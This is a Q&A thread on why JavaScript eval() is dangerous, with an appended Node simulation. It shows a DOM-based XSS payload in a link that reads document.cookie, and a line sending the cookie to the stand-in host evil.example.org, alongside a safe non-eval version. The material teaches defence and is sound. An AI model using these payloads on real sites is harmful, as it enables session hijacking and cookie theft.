 

javascript eval() and security

developer.mozilla.org says:

Don't use eval needlessly! eval() is a dangerous function, which executes the code it's passed with the privileges of the caller.

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

Any malicious user can turn on the Chrome debugger, for example, and modify the JavaScript code that is being executed, so he can insert his own functions to be executed, etc.

Is there such thing as "secure javascript code" in general?

asked Aug 20 '16 20:08 by Jaunius Eitmantis




1 Answer

Any malicious user can turn on the Chrome debugger, for example, and modify the JavaScript code that is being executed, so he can insert his own functions to be executed, etc.

Yes, a user can "attack" their own client-side session using JavaScript by using developer tools.

However, the difference between eval and developer tools is that eval may execute things in shareable links. The attacker could send their victim a link, which exploits the code evaluation function.

Take this code:

<script>
eval('alert("Your query string was ' + unescape(document.location.search) + '");');
</script>

Now, if the query string is ?foo, you simply get an alert dialog stating the following: Your query string was ?foo

Now say Chuck sends Bob an email with the subject "Look at this great link!".

The link is constructed as follows:

http://www.example.com/page.htm?hello%22);alert(document.cookie+%22 (where www.example.com is your website).

This modifies the code that is executed by eval() to

alert("Your query string was hello");
alert(document.cookie+"");

(New lines added by me for clarity). This will show an alert box displaying all the non httpOnly cookies.

Take this to the next stage and the attacker could construct an image link to send the session cookie to themselves

new Image().src="https://evil.example.org/?cookie=" + escape(document.cookie)

This is known as a Cross-Site Scripting (XSS) attack. In fact, the type is a DOM based XSS, to be specific.

Is there such thing as "secure javascript code" in general?

Yes, code that's secure against XSS could be considered "secure JavaScript code" - it protects the current user from cross-domain attacks. However, server-side code that "trusts" that the current end-user won't modify JavaScript code or variables to their own advantage using developer tools isn't secure.

Therefore secure JavaScript code is such code that will protect the current user only.

answered Oct 01 '22 16:10 by SilverlightFox
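The attack described in the answer above, reproduced as an added example that is not part of the original question or answer. It runs in Node with `alert`, `document.cookie` and `Image` replaced by constructed stand-ins that record what a browser would have shown or fetched, so the eval'd source can be inspected offline. Next to the vulnerable handler it shows the same feature written without code generation, plus one caveat a practitioner hits when swapping `unescape` for `decodeURIComponent`: the latter throws on malformed percent-encoding. The cookie value, the hostname evil.example.org and the query strings are sample data constructed for this example.

```javascript
// Added example: the DOM-based XSS from the answer, simulated in Node.
// Constructed stand-ins for the browser objects the page's code touches.
const alerts = [];                                  // what alert() would have displayed, in order
const requests = [];                                // URLs a browser would fetch for new Image().src
const document = { cookie: 'session=abc123' };      // constructed non-HttpOnly cookie, readable by script
function alert(msg) { alerts.push(String(msg)); }
class Image { set src(url) { requests.push(url); } }

// The vulnerable pattern from the answer: the query string is pasted into source
// text, so any characters the attacker percent-encodes in the link become code.
function greetUnsafe(search) {
  eval('alert("Your query string was ' + unescape(search) + '");');
}

// Same feature with no code generation: the query string is only ever a value.
// decodeURIComponent throws on malformed sequences (unescape passes them through),
// so that failure mode is handled explicitly rather than surfacing as an exception.
function greetSafe(search) {
  let shown;
  try {
    shown = decodeURIComponent(search);
  } catch (e) {
    shown = '(malformed query string)';
  }
  alert('Your query string was ' + shown);
}

// Runs one handler against a query string and returns what would have been
// alerted and which outbound requests would have been triggered.
function simulate(handler, search) {
  alerts.length = 0;
  requests.length = 0;
  handler(search);
  return { alerts: alerts.slice(), requests: requests.slice() };
}

// Constructed query strings: the benign one and Chuck's link from the answer.
const benign = '?foo';
const chucksLink = '?hello%22);alert(document.cookie+%22';
// The answer's "next stage": the same injection point used to ship the cookie
// to an attacker-controlled host (hostname is a constructed example).
const exfilLink =
  '?x%22);new%20Image().src=%22https://evil.example.org/?cookie=%22%2Bescape(document.cookie);//';

for (const [label, handler] of [['eval', greetUnsafe], ['no eval', greetSafe]]) {
  console.log(label, JSON.stringify(simulate(handler, chucksLink)));
  console.log(label, JSON.stringify(simulate(handler, exfilLink)));
}
```

With `greetUnsafe`, Chuck's link produces two alerts, the second containing the cookie, and the exfiltration link produces one outbound request carrying `session%3Dabc123`; with `greetSafe`, both links produce a single alert whose text is the payload itself and no request, because the string never reaches a parser.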